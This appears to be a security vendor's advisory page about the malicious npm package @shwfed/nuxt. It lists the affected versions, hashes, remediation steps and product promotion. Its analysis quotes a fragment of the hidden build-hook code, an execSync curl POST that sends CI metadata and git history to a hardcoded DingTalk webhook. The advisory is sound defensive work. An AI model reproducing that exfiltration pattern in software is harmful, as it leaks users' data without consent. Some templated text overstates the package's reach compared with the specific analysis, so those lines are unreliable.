Which versions of @shwfed/nuxt are malicious?

The following npm versions of @shwfed/nuxt are flagged malicious: 0.12.0, 0.13.0, 0.13.1. Treat any of these as compromised.

How do I remediate @shwfed/nuxt if I installed it?

@shwfed/nuxt is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

I already installed @shwfed/nuxt — how do I know if it already compromised me?

If @shwfed/nuxt was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is @shwfed/nuxt part of a known attack campaign?

Yes — @shwfed/nuxt is associated with the IN-MAL-2026-004583, IN-MAL-2026-004127, IN-MAL-2026-004128, IN-MAL-2026-004582, IN-MAL-2026-006155, IN-MAL-2026-006154 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find @shwfed/nuxt across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for @shwfed/nuxt (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging @shwfed/nuxt across your stack and pipelines.

Malicious package

@shwfed/nuxtnpm

Malicious code in @shwfed/nuxt (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4444

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall @shwfed/nuxt

What this malware does

@shwfed/nuxt is published as a Nuxt UI module but contains undocumented build-hook code that, when a consumer integrates the module and runs a build under CI, POSTs the consumer's CI/build metadata and recent git history to a hardcoded third-party DingTalk webhook owned by the package author. In dist/module.mjs, the build:error and build:done Nuxt hooks invoke execSync("curl -s -X POST '${url}'... -d @-", { input: payload }) against https://oapi.dingtalk.com/robot/send with an embedded access_token (a01e0fdf...) and an embedded HMAC signing secret (SEC9d852...). The payload includes JOB_NAME, BUILD_NUMBER, branch name, RUN_DISPLAY_URL, build error message, the last 5 git log entries (commit subjects and author names) from the consumer's repository, and the last commit author. The destination is fixed in the source — not configurable, not documented, and unrelated to the module's advertised UI-component purpose. Any consumer that adds this module to their Nuxt config and runs CI builds leaks build status and recent git commit metadata (including third-party committer names) to the author's DingTalk channel without consent.

Malicious versions

3 flagged

0.12.00.13.00.13.1

Indicators of compromise (SHA-256)

04c497e228a9ddf1560202c00b4a4a316bf4e44a76f032f35ac83da01ff5f866

87ac343d6f89a601749bb115fa6902e7d39c71a0a6469690ecef56e9ea8a135e

cc9864d615e6760cc4ce5f9037b93cb29a5f1c044cafa7736f7d3a953a42f6a4

0bf4290eabdf1af188406fbba698fba9e3d85b7a976bd5cc6fb77b862c0c1b2e

3336b06325a199568cd0fffee2cec27695d7e49be7d5cb333bcb3569ff846aec

63b019ca84778d17faf6bd57d455e1af9c7a07535d8cba7f69456d14e81419b2

Detection & response playbook

Credential / info stealer

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for @shwfed/nuxt (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging @shwfed/nuxt across your stack and pipelines.
If you installed it — respond
@shwfed/nuxt is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.
Did it already run?
If @shwfed/nuxt was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks @shwfed/nuxt before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. @shwfed/nuxt on npm has been identified as a malicious package (versions 0.12.0, 0.13.0, 0.13.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004583IN-MAL-2026-004127IN-MAL-2026-004128IN-MAL-2026-004582IN-MAL-2026-006155IN-MAL-2026-006154

References

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks @shwfed/nuxt-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

Malware detection Runtime egress monitoring